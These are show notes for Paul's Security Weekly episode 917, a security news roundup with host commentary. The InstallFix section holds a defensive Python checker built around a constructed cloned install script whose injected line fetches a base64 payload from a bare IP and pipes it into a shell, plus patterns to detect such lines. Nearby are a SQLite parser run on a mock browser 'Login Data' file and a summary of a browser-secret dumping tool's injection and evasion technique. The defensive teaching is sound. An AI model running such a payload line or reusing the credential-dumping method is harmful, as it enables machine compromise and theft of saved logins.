Vulnerability Mis-Management – PSW #917
In the security news this week:
- The XZ backdoor documentary
- Zero days - the clock isn't ticking
- Vulnerability Mis-Management
- Reversing traffic light controllers
- Reversing with Claude
- Don't curl to bash!
- Reading CVEs makes my head hurt
- Dumping browser secrets
- I open-sourced a new(ish) tool
- D-LINK exploits
- There is no password
- I control the building
- When old vulnerabilities become new
- Tile is for stalkers
- Hacking AI
- Iran War: What cybersecurity needs to know
- National cyber strategy
- Coruna
- I got phished and I want a refund
Security Weekly listeners save $100 on their RSAC 2026 All Access Pass! RSAC 2026 Conference will take place March 23rd to March 26th in San Francisco. To register using our discount code, please visit securityweekly.com/rsac26 and use the code 56U5SECWEEKLY! We hope to see you there!
Paul Asadoorian
- The Internet Was Weeks Away From Disaster and No One Knew
This was a great little documentary on the XZ backdoor. It starts at the beginning of open source, even though they didn't attribute Linus's law correctly: "Given enough eyeballs, all bugs are shallow" was coined by Eric S. Raymond in his 1999 essay and book The Cathedral and the Bazaar. It is named Linus's Law in honor of Linus Torvalds, which is why it's often misattributed to him.
- Zero Day Clock
This is worth showing as it tracks interesting stats...
- Reevaluating vulnerability management
Adrian points out and backs up much of what we have been saying about vuln management: It's not working or keeping up. Given that, what do we do? We can solve the asset identification problem with technology, but that's just the first step. We still need to store the data and act on the data...
- Spoofing An Emergency Traffic Preemption Signal
While some claim to do this with a Flipper Zero, this person acquired an actual device that would sit on a traffic light and reverse-engineered it. Turns out at least some of these systems are preprogrammed with vehicle IDs, and without them, you can't change the traffic lights...
- Hi-IR-Brid – High Power Flipper Zero IR Module by Jaay’s Electronics on Tindie
This is a great price. Not sure if it works, but looks awesome.
- Claude Static Binary Analysis of BPFDoor Malware on Linux
If you give Claude the right tools it does an amazing job at reverse engineering malware. It's gotten much better over time and this is a great example. It automates things like hashing the file(s) and so much more. Check this one out, then you can go build a Claude malware analyzer for yourself. I mostly analyze Linux binaries, so mine is tuned for that. There are probably entire projects that show you how to use Claude for this, and it's on my list to make skills and such to make this even better. Also, speaking of tools, one of the tools I incorporate in Claude is radare2, and next week we will be interviewing the creator and lead developer who goes by the handle "pancake". Don't miss it!
- Stranger Things Meets Cybersecurity: Lessons from the Hive Mind
Articles like this are fun, and I enjoyed Stranger Things, and relating that to infosec was neat, but admittedly I enjoyed the ST references more than the infosec references.
- InstallFix: Weaponizing malvertized install guides
InstallFix is a new attack category where threat actors clone installation pages of legitimate CLI tools — like Anthropic's Claude Code — and swap out the real curl | bash one-liner with a malicious one. The victim sees a pixel-perfect replica of the real site and copies what looks like a normal install command.
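An added example (my own, not code from the InstallFix write-up or from any vendor's installer) of the habit that defeats this: fetch the script to disk, check it against a digest pinned from a second channel, and read it before anything executes. Python stands in for the shell workflow so the checks are testable; both scripts, the releases.example.test URL and the 198.51.100.23 staging host are constructed samples.

```python
import hashlib
import hmac
import re

# Constructed sample: what the vendor's real install page serves (hypothetical, not a real installer).
GENUINE_SCRIPT = b"""#!/bin/sh
set -eu
curl -fsSL https://releases.example.test/cli/v1.2.3/cli-linux-x86_64.tar.gz -o /tmp/cli.tgz
tar -xzf /tmp/cli.tgz -C "$HOME/.local/bin"
"""

# Constructed sample: the cloned page's copy, identical except for one injected stage at the end.
CLONED_SCRIPT = GENUINE_SCRIPT + b"""curl -fsSL http://198.51.100.23/s.txt | base64 -d | sh
"""

# Digest pinned from a channel the cloned page cannot control (signed release manifest, package repo).
PINNED_SHA256 = hashlib.sha256(GENUINE_SCRIPT).hexdigest()


def sha256_matches(script, pinned_hex):
    """Compare the fetched script's SHA-256 with the pinned value in constant time."""
    return hmac.compare_digest(hashlib.sha256(script).hexdigest(), pinned_hex)


# Cheap tripwires for the patterns a swapped one-liner tends to carry. A clean scan is not a verdict.
SUSPICIOUS = [
    (re.compile(rb"base64\s+(-d|--decode)\s*\|\s*(sh|bash)"), "decodes a hidden payload straight into a shell"),
    (re.compile(rb"\beval\b"), "eval of dynamic content"),
    (re.compile(rb"https?://\d{1,3}(\.\d{1,3}){3}"), "fetches from a bare IP address"),
    (re.compile(rb">>\s*[^\n]*\.(bashrc|zshrc|profile)"), "persists into a shell rc file"),
    (re.compile(rb"\bhttp://"), "plaintext HTTP download"),
]


def inspect_script(script):
    """Return (line_no, reason, line) for every line that trips a heuristic."""
    findings = []
    for no, line in enumerate(script.splitlines(), 1):
        for pattern, reason in SUSPICIOUS:
            if pattern.search(line):
                findings.append((no, reason, line.decode(errors="replace")))
    return findings


def safe_to_run(script, pinned_hex):
    """Gate: execute only if the digest matches AND nothing in the script trips a heuristic."""
    return sha256_matches(script, pinned_hex) and not inspect_script(script)


if __name__ == "__main__":
    for name, script in (("genuine", GENUINE_SCRIPT), ("cloned", CLONED_SCRIPT)):
        print(name, "digest ok:", sha256_matches(script, PINNED_SHA256),
              "safe:", safe_to_run(script, PINNED_SHA256))
        for no, reason, line in inspect_script(script):
            print("  line", no, "-", reason, ":", line)
```

The pin is only worth something if it comes from a place the cloned page does not control; an attacker who can swap the one-liner can also publish a matching hash beside it. The heuristics exist to make the injected stage jump out during the read-through, not to replace it.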
- NVD – CVE-2025-20064
Why does Intel publish advisories that read like this: "System software adversary with a privileged user combined with a high complexity attack may enable local code execution. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (high), integrity (high) and availability (high) impacts." - My head hurts. Can we not just write English and form readable sentences to describe a vulnerability any more? I'm so confused...
- GitHub – Maldev-Academy/DumpBrowserSecrets
Some notable items:
- Rather than patching Chrome's elevation service or abusing IElevator directly from an external process (which fails due to identity checks), it spawns a headless Chromium process and injects a DLL via Early Bird APC injection — queuing execution before the main thread starts. The injected DLL calls IElevator from within the legitimate Chromium process context, then pipes the decrypted key back via a named pipe. This is a cleaner and more reliable ABE bypass than most public PoCs, which typically require patching the service or running as SYSTEM.
- Version 1.1.1 introduced SQLoot, a custom SQLite3 file format parser that replaces the standard sqlite-amalgamation library. This directly reduces the compiled binary's static footprint and removes a well-known library signature that EDRs and AV engines key on.
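An added example of what a hand-rolled SQLite reader has to do, written here for illustration; it is my code, not SQLoot or any other part of DumpBrowserSecrets. It parses the 100-byte file header, walks a table b-tree leaf page through its cell pointer array, and decodes each record's serial types, exercised against a constructed database shaped like a Chromium "Login Data" file (the URL, username and "v10"-prefixed blob are made up). Overflow pages and interior b-tree pages are deliberately not handled; the sample is assumed to fit in one page per table.

```python
import os
import sqlite3
import struct
import tempfile


def read_varint(buf, pos):
    """Decode SQLite's big-endian varint at buf[pos]; return (value, next_pos)."""
    value = 0
    for i in range(8):
        b = buf[pos + i]
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            return value, pos + i + 1
    return (value << 8) | buf[pos + 8], pos + 9  # 9th byte carries all 8 bits


def parse_file_header(buf):
    """Parse the 100-byte database header: magic string, page size, page count."""
    if buf[:16] != b"SQLite format 3\x00":
        raise ValueError("not an SQLite 3 database")
    page_size = struct.unpack(">H", buf[16:18])[0]
    page_size = 65536 if page_size == 1 else page_size
    return {"page_size": page_size, "page_count": struct.unpack(">I", buf[28:32])[0]}


def decode_record(buf, pos):
    """Decode one record: a varint header listing serial types, then the values in order."""
    header_size, p = read_varint(buf, pos)
    types, end = [], pos + header_size
    while p < end:
        st, p = read_varint(buf, p)
        types.append(st)
    int_widths = {1: 1, 2: 2, 3: 3, 4: 4, 5: 6, 6: 8}
    values = []
    for st in types:
        if st == 0:
            values.append(None)
        elif st in int_widths:
            n = int_widths[st]
            values.append(int.from_bytes(buf[p:p + n], "big", signed=True)); p += n
        elif st == 7:
            values.append(struct.unpack(">d", buf[p:p + 8])[0]); p += 8
        elif st in (8, 9):
            values.append(st - 8)          # literal integers 0 and 1
        elif st >= 12 and st % 2 == 0:     # BLOB of (st-12)/2 bytes
            n = (st - 12) // 2
            values.append(bytes(buf[p:p + n])); p += n
        elif st >= 13:                     # TEXT of (st-13)/2 bytes (UTF-8 encoding assumed, the default)
            n = (st - 13) // 2
            values.append(buf[p:p + n].decode("utf-8")); p += n
        else:
            raise ValueError("reserved serial type %d" % st)
    return values


def leaf_rows(buf, page_offset, page_header_offset=0):
    """Walk the cell pointer array of a table b-tree leaf page and decode every (rowid, record)."""
    h = page_offset + page_header_offset
    if buf[h] != 0x0D:
        raise ValueError("expected a table b-tree leaf page (0x0D)")
    ncells = struct.unpack(">H", buf[h + 3:h + 5])[0]
    rows = []
    for i in range(ncells):
        cell = page_offset + struct.unpack(">H", buf[h + 8 + 2 * i:h + 10 + 2 * i])[0]
        _payload_len, p = read_varint(buf, cell)  # assumption: payload is in-page, no overflow chain
        rowid, p = read_varint(buf, p)
        rows.append((rowid, decode_record(buf, p)))
    return rows


def dump(path):
    """Return (file header, sqlite_master entries, rows of the first user table)."""
    with open(path, "rb") as f:
        buf = f.read()
    hdr = parse_file_header(buf)
    # Page 1 holds sqlite_master; its b-tree page header starts right after the 100-byte file header.
    columns = ("type", "name", "tbl_name", "rootpage", "sql")
    schema = [dict(zip(columns, rec)) for _, rec in leaf_rows(buf, 0, 100)]
    root = schema[0]["rootpage"]
    return hdr, schema, leaf_rows(buf, (root - 1) * hdr["page_size"])


def build_sample_db(path):
    """Constructed sample shaped like a browser 'Login Data' file; the values are made up."""
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)")
    con.execute("INSERT INTO logins VALUES (?, ?, ?)",
                ("https://example.test", "alice", b"v10" + bytes(range(16))))
    con.commit()
    con.close()


def demo():
    path = os.path.join(tempfile.mkdtemp(), "Login Data")
    build_sample_db(path)
    return dump(path)


if __name__ == "__main__":
    hdr, schema, rows = demo()
    print(hdr, [s["name"] for s in schema], rows)
```

Even this toy reader never links the SQLite library, which is the footprint argument the release notes make; the price is that every format feature the amalgamation handles for free (overflow pages, interior pages, WAL files, freelist trash) becomes the tool author's problem, and a defender's YARA rule can key on the parser's own string constants just as easily as on the library's.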
- GitHub – pasadoorian/MiTMBeast
I presented this tool on a prior technical segment. I've quietly released it, up until now. It's the tool I use to create a separate network for analyzing IoT and appliances, and now it's open source! It's really just some Bash scripts that help automate setting up and maintaining an environment for network traffic snooping, interception, and collection.
- D-LINK Exploit Repo
Some of these vulnerabilities and exploits were released recently. Interesting repo with a TON of exploits for D-LINK devices, even though some of the "exploits" are just instructions on how to find and test the vulnerability, leaving weaponization as an exercise for the reader. Use at your own risk, I did not test or validate this!
- HPE Aruba Networking AOS-CX, Multiple Vulnerabilities
CVE-2026-23813 (CVSS 9.8) is an unauthenticated auth bypass with admin password reset — no creds, no interaction, just network access to the management interface. That's your crown jewel. Pair it with three command injection bugs (CVE-2026-23814, -23815, -23816) that let attackers escape the CLI sandbox and execute arbitrary OS commands on the underlying Linux system, and you've got a full device takeover chain on switches that sit at the core of enterprise networks.
- CVE-2026-3611: Unauthenticated IQ4 Web HMI Exposes Critical BMS Risk
Crux of the issue:
- When an IQ4 controller is in its factory-default configuration, and no user module is enabled, the embedded web HMI is available without authentication.
- In that default state, the system runs under a privileged context (described by researchers as System User, level 100), granting read/write capabilities.
- Authentication enforcement is only enabled after a web user account is created through a web endpoint (U.htm) that dynamically activates the user module.
- Crucially, the endpoint used to create the first web user is accessible before authentication. This means a remote actor who can access the HTTP interface can create an administrative account using attacker-controlled credentials — thereby enabling authentication under their control.
This could be interesting as: "The IQ4 family...is a line of building-management system (BMS) controllers used to manage HVAC, lighting, and other building automation functions across commercial, healthcare, government, and industrial facilities."
- Release v2.0.0b1 · mandiant/speakeasy
I need to start using this:
Speakeasy is Mandiant's Windows kernel/user-mode emulator designed for scalable malware analysis without running code on bare metal. The v2.0.0b1 release is notable for several reasons:
- Unicorn 2 migration — Moving to Unicorn 2 modernizes the entire emulation core. This is a foundational change that improves accuracy and maintainability of the whole framework.
- Complex multi-stage unpacking — The updated engine now handles deeply nested, multi-stage packers and loaders more reliably. This is critical for modern malware that uses layered obfuscation/packing (e.g., Cobalt Strike loaders, advanced ransomware stagers).
- Deep system introspection — Enhanced ability to inspect internal system state during emulation, which is valuable for behavioral analysis and shellcode triage.
- API traces on par with sandboxes — This is arguably the most impactful claim. Speakeasy's API call tracing now approaches the fidelity of full dynamic sandboxes (like Cuckoo or ANY.RUN), but without the overhead of a real OS. For high-volume malware triage at scale, this is a major capability uplift.
- GitHub – ghostvectoracademy/DLLHijackHunter: Automated DLL Hijacking Discovery, Validation, and Confirmation. Turning local misconfigurations into weaponized, confirmed attack paths.
I like this approach for this reason: "Rather than just flagging missing DLLs (which produces tons of false positives), it drops a canary DLL into the target path and uses a named pipe to confirm whether the DLL actually gets loaded and executed. This proves exploitability rather than just theoretical possibility."
- 14 old software bugs that took way too long to squash
This disproves the theory that "all bugs are shallow given enough eyes", perhaps classes of bugs fall into this category, but not security vulnerabilities. Vulnerabilities are tricky to spot, and go undetected in software for long periods of time. If they were easy to spot, or developers really truly knew how to not introduce them, we wouldn't have 319,790 CVEs in the database (that number is from today). And, that's not all the vulnerabilities that have been disclosed, the number is much higher. My fear: Someone knows about vulnerabilities that have not been disclosed and is not disclosing them. If we are discovering vulnerabilities after they are exploited, we are losing.
- LILYGO to debut Spark, a cross-platform hub and flash tool for ESP devices
LILYGO, while still in BETA, has a new tool and ecosystem similar to M5 Stack's M5burner. It has a bunch of new tools and the ability to "Browse, search, and download official & community firmware for LILYGO devices". Can't wait to try this out.
- espflash – a new Go tool to serially flash firmware to Espressif devices
The official esptool.py is still far superior in terms of features; however, if you need a small flasher written in Go, or want to flash devices using Go native code, espflash is interesting.
Jeff Man
- Stryker cyber attack LIVE: Hackers cripple medical giant’s global systems
One of my co-workers tipped me off to this because a friend of theirs was impacted. Stryker is a global leader in medical technology, manufacturing products for orthopaedics, medical/surgical, and neurotechnology. All IT systems at Stryker remain down after the cyber attack. The Iranian-backed hacking group, Handala, is allegedly claiming to have taken responsibility for the attack.
- Iran War: The Convergence of Cyber and Kinetic Warfare
Might as well stick to this theme. Offensive cyber operations are a large part of this conflict with U.S., Israel, and Iran.
- US entities face heightened cyber risk related to Iran war
"The military campaign against Iran is putting local governments, critical infrastructure providers and major U.S. companies at heightened risk of disruptive attacks." How is this statement true based on the classic risk equation? What's changed is the heightened resolve or intent of the adversary (threat).
- Securing Critical Infrastructure in a Time of War
"Danger, Will Robinson!"
- President Trump’s Cyber Strategy for America
Good thing we finally have a national cyber strategy! This was released late last Friday.
- New National Cyber Strategy and EO Lays Out a Path for Combating Cybercrime and Promoting Innovation
Also released last Friday was an Executive Order focused on cybercrime and a fact sheet. This article summarizes all three.
- COMBATING CYBERCRIME, FRAUD, AND PREDATORY SCHEMES AGAINST AMERICAN CITIZENS
Sure seems to be laying the framework for offensive and perhaps pre-emptive cyber operations against all enemies foreign and domestic.
- Fact Sheet: President Donald J. Trump Combats Cybercrime, Fraud, and Predatory Schemes Against American Citizens
Reads more like talking points for any press or media coverage.
Larry Pesce
- Tile’s Security Is So Bad It’s a Feature for Stalkers
- AI allows hackers to identify anonymous social media accounts, study finds
- From One Thousand Pages of Specification to Unveiling Hidden Bugs: Large Language Model Assisted Fuzzing of Matter IoT Devices
- Reverse-engineering the UniFi inform protocol — Tamarack
- How We Hacked McKinsey’s AI Platform
- MedTech Giant Stryker Crippled by Iran-Linked Hacker Attack
Lee Neely
- Coruna: The Mysterious Journey of a Powerful iOS Exploit Kit
Google Threat Intelligence Group (GTIG) has identified a new and powerful exploit kit targeting Apple iPhone models running iOS version 13.0 (released in September 2019) up to version 17.2.1 (released in December 2023). The exploit kit, named “Coruna” by its developers, contained five full iOS exploit chains and a total of 23 exploits. The core technical value of this exploit kit lies in its comprehensive collection of iOS exploits, with the most advanced ones using non-public exploitation techniques and mitigation bypasses.
These patched flaws in Apple products have been added to the CISA KEV following a threat intelligence report from Google that describes campaigns targeting iOS 13.0 to iOS 17.2.1 with a "comprehensive collection" of exploits: CVE-2021-30952, CVE-2023-41974 and CVE-2023-43000, with due dates of 3/26/26.
- NIST Urged to Go Deep in OT Security Guidance
Experts are weighing in on SP 800-82 revisions. The current guidance is from 2023 and in need of updates.
Three major vendors — Dragos, Claroty, and Armis — shared their NIST input with Gov Infosecurity parent company Information Security Media Group (ISMG). All three asked "for more detailed, specific guidance for OT owners and operators, especially on issues like vulnerability management." Dragos Vice President of Public Policy and Government Affairs Kate Diemidio noted that "The more granular and specific these frameworks and guidelines can get, the more helpful it is." The feedback also called for "more sector-specific guidance for emerging OT verticals like smart building management and distributed energy systems, such as electric vehicle charging networks." The vendors also voiced agreement with NIST's proposal to move some appendices online and make them "dynamic web resources." Claroty's comments urge NIST to "emphasize the importance of vendor transparency regarding patch validation," and to encourage vendors to issue disclosures in machine-readable formats "that map specific fixes to specific hardware/firmware variations."
- EU court adviser says banks must immediately refund phishing victims
Athanasios Rantos, the Advocate General of the Court of Justice of the EU (CJEU), has issued a formal opinion suggesting that banks must immediately refund account holders affected by unauthorized transactions, even when it's their fault.
Under EU law, unless the bank suspects customer fraud, the first step for a payment service provider must always be to refund the transaction, contends Rantos. Afterward, however, if the bank provides evidence establishing failure or gross negligence by the customer in their obligations to protect their own data, the customer may be required to bear the losses or enter litigation with the bank.
- Ericsson US discloses data breach after service provider hack
Ericsson Inc. has sent notification letters to an undisclosed number of individuals to inform them that their personal information was compromised in a cyberattack on one of the company's service providers. Ericsson Inc. is the US subsidiary of the Swedish networking and telecommunications company.
They became aware of a suspicious event on April 28, 2025; the investigation found the attackers were in their systems April 17-22, and it was completed Feb 28, 2026. That is just too long between the breach and notification.
- FBI warns of phishing attacks impersonating US city, county officials
The FBI's Internet Crime Complaint Center (IC3) has published an alert warning of a phishing scheme that involves the impersonation of city and county officials fraudulently seeking payment for planning and zoning permits. The cybercriminals target businesses and individuals with active permit applications; the messages contain detailed, accurate information including property addresses, case numbers and true names of officials, use official language, and contain an invoice with itemized charges that are urgently due.
FBI PSA: https://www.ic3.gov/PSA/2026/PSA260309?
- Wikimedia Foundation/Product and Technology/Product Safety and Integrity/March 2026 User Script Incident – Meta-Wiki
Wikimedia Foundation staff were conducting a security review of user-authored code across Wikimedia projects. During that review, we inadvertently activated dormant code that was then quickly identified to be malicious.
The code was active for a 23-minute period. This caused page deletions on Meta-Wiki that have since been restored. To prevent the script from spreading further while we investigated, Wikimedia projects were set to read-only for about 2 hours, and all user JavaScript was temporarily disabled for most of the day.
From John Pescatore: Just as bomb defusing procedures should never say “Cut the red wire AFTER you cut the blue wire…” the instructions for malicious code analysis should be clear about how to assure not executing the code in an operational environment.